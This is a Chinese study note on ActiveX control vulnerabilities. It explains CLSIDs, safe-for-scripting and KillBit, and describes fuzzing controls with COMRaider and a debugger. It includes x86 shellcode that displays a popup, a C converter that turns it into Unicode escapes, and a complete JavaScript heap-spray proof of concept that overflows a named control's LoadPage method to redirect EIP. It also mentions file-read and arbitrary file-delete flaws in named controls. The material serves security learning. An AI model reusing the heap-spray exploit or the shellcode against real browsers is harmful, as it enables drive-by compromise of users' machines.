activeX控件学习

ActiveX是Microsoft对于一系列策略性面向对象程序技术和工具的称呼，其中主要的技术是组件对象模型（COM）。在有目录和其它支持的网络中，COM变成了分布式COM（DCOM）。

先前 学习的  ACX控件 溢出

通过一个精心构造的 exploit第三方软件中的activeX已经成为  “网马” 惯用的 手段

一些控件封装着一些逻辑较为复杂的方法，并通过  网页中的脚本经过浏览器诶调用执行。

因此控件攻击的大多是通过在网页中插入非法调用的脚本来实现

EG: flash脚本

<object classid="clsid:D27CD```````"> codebase= "`````" width=""  height ="">
````
<embed src="1.swf"  ````````>
</object>

重要的地方为 object 这个html 标签。当用户使用浏览器访问包含这段代码的网页文件时，用户的浏览器在解析到 "object"这个标签是，就会自动调用系统的flash 控件 从而播放1.swf

每一个ACX控件在被注册进入操作系统之后，就会在注册表中建立一个用来表示自己，这个键值被称为 "CLSID"

可以在注册表 HKEY_CLASSES_ROOT\CLSID  找到，全部的 ACX控件

其实只关注 被浏览器加载的那些ACX控件，这类信息可以去 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility 下查看

1）查看  一个ACX 控件必须被标记为 可安全执行脚本（as safe for scripting） 可以查看  对应的 CLSID项下是否有 Implemented Categories 选项即可 

EG:   HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}\Implemented Categories

除了 safe scripting 外，微软还提供了KillBit 的机制来阻止ACX控件被浏览器自动调用，MSDN表示，KillBit是ACX控件的兼容性标志位

2）浏览器首次调用时会给出一个提示警告，用户在确定并同意后，浏览器才会下载安装该ACX控件

当 “可安全执行脚本” 被取消时，IE会用警告消息提示您，该ACX控件可能不安全，根据选择热可能被调用，

但是当启用Killit后 ，只要不启用 “对未标记为安全的ACX控件初始化并执行脚本”  选项，IE就不会调用该克难攻坚。所以ACX被设置了KillBit他就很难再被浏览器调用了

设置KillBit 方法：  Compatibility Flags  值设为  0x400,  WIN7  64  几乎全是····

OLEVIEW  可以查看 系统中已经注册的 ACX控件的用户接口，打开OLEVIEW程序，其中有一个TYPE LIB 选项，该选项包含了注册过的所有ACX控件信息

示例：

<object classid="clsid: 05792C8E-941F-11D0-8529-00C04FD8D503" name="evil">
</object>
<script>
evil.name = "xxx";
</script>

1）建立一个字符串/数字变量
2）字符串-》超长字符串，数字变量-》0/负数/小数/超大数字
3）依照被测试控件的接口需要的参数形式传递给用户接口
4）保存代码，放置在该测试魔板到 WEB服务目录下
5）OD 挂接IE ，通过浏览器访问测试魔板文件
6 OD监视到发生错误····

测试 ACX工具：

COMRaider 

AxMan   ie6.0

AxFuzz   学习源码 学习怎么编写ACX

COMRaider  学习：

regsvr32  C:\iDefense\COMRaider\vuln.dll

得到两个文本 显示 ACX的信息

可以设置OD  调试了

默认生成的  脚本为 VBS

············································································································································································································

网页木马  利用网页脚本代码编写出来的，通过浏览器本身或者ACX控件漏洞，实现向用户系统安装木马病毒程序目的的网页文件

············································································································································································································

怎么去寻找一个程序的  ACX控件：

可以监视 生成的  WINDOW/SYSTEM32/下的DLL    因为ACX控件都要保存在这里吧？····

示例  ： 超星阅读 查找

DispCallFunc  函数 进入 ACX控件····················

编写  ACX  POC  时  要注意啊   这个是UNICODE的  不能直接复制  ASCII 码

写了个转换 程序：

#include "stdio.h"
#include <windows.h>
char popup_general[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90";//168 xp sp3

void encoder (char* input)// bool display_flag
{
	int i=0,len=0;
	unsigned char * output;

	len = strlen(popup_general);
	output=(unsigned char *)malloc(len+1);


	for(i=0;i<len;i++)
	{
		output[i] = popup_general[i];
	}


	FILE *fp2 = fopen("2.txt","w+");

	printf("\"");
	fprintf(fp2,"\"");
	len = strlen((const char *)popup_general);
	for(i=0;i<len;)
	{		
		printf("\\u%0.2x",output[i+1]);
		fprintf(fp2,"\\u%0.2x",output[i+1]);
		printf("%0.2x",output[i]);
		fprintf(fp2,"%0.2x",output[i]);
		i += 2;
		if(i%16==0)
		{			
			printf("\"+\n\"");
			fprintf(fp2,"\"+\n\"");
		}
	}
	printf("\";");
	fprintf(fp2,"\";");
	fclose(fp2);
}
void main()
{
	encoder(popup_general);
	getchar();
}

pe() 编码的字符串进行解码。 举个例子就清楚了··················

<script type="text/javascript">

var test1="Visit W3School!"

test1=escape(test1)
document.write (test1 + "<br />")

test1=unescape(test1)
document.write(test1 + "<br />")

</script>

输出：

Visit%20W3School%21
Visit W3School!

2)substring() 方法用于提取字符串中介于两个指定下标之间的字符。

HeapSpray    一般会将EIP 指向堆区的 0x0c0c0c0c 然后用 JS 申请大量堆内存，并用包含着0x90 和shellcode的“内存片” 覆盖这些内存

JS 会从内存低地址 -》 高地址分配内存，因此申请的内存超过 200M （200M = 200 * 1024 *1024 = 0x0c800000 > 0x0c0c0c0c）

0x0c0c0c0c 会被含有 shellcode 的内存片 覆盖，只要内存片中的  0x90能命中 0x0c0c0c0c 位置，shellcode就能运行

覆盖256字节后 发现EIP   所以构造如下   将  EIP  构造为  0xc0xc0xc0xc  

JS POC 代码：

<object classid='clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2' id='target' /></object>
<script>
var nop = unescape("%u9090");
var shellcode=
"\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91"+
"\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332"+
"\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c"+
"\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505"+
"\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b"+
"\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06"+
"\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c"+
"\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd"+
"\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33"+
"\u6853\u6164\u2330\u2368\u6150\u8b6e\u53c4\u5050"+
"\uff53\ufc57\uff53\uf857\u9090";

  while (nop.length < 0x100000/2) 
{nop += nop;}

nop=nop.substring(0,0x100000-32/2-4/2-2/2-shellcode.length);
nop =nop+ shellcode;
  var memory = new Array();
  for (var i=0;i<200;i++) 
{memory[i] += nop;}

var str = '';
while(str.length <256) {str += '\x0a\x0a\x0a\x0a';}
str +=   "\x0c\x0c\x0c\x0c" ;
target.LoadPage(str, 1, 1, 1);
</script>

第二个实验为   目录操作权限的 漏洞

COMRaider 看到  open 函数

利用OCX 的 open 函数  打开 来判断文件系统中是否存在某个特定文件，相当于开放了文件系统的列目录权限

第三个实验 文件读权限 漏洞

COMRaider 看到  safe for script    killbit false

用户接口 发现 read 和 save

第四个实验  文件删除权限漏洞

卡巴 的控件 提供了一个 DeleteFile 接口 发现可以删除任意文件